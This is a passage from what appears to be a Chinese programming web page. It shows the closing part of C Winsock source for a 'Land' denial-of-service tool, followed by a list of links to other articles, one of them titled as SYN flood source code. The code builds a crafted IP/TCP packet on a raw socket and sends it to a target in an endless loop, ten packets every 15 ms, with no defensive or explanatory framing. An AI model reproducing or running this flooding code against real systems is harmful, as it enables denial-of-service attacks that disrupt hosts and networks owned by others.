memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));

memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);

ipHeader.checksum=Landchecksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

while(1){

//Sleep(10);//800

Sleep(15); //500

for(int i=0;i<10;i++)

{

Land=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),

0, (struct sockaddr*)&addr_in, sizeof(addr_in));

if (Land==SOCKET_ERROR)

{

//printf("Land error:%d\n",WSAGetLastError());

return -4;

}

}

}//end while

closesocket(sock);

WSACleanup();

return 0;

}

/***********************************************/

• ·JDOM操作XML文件(法老修正版)
• ·C＋＋ Template学习笔记之函数模板（6
• ·php 调用 java类 常见配置错误(Inb
• ·C＋＋ Template学习笔记之函数模板（5
• ·Java关键字: transient | s
• ·OSWorkflow深入分析 － 重新定义Co
• ·D版SynFlood源码
• ·我用卸妆油都长痘，护肤油不就更加…… 实际上：
• ·老山行：网友拜祭烈士组图（边读边流泪……）
• ·StrutsFileUpload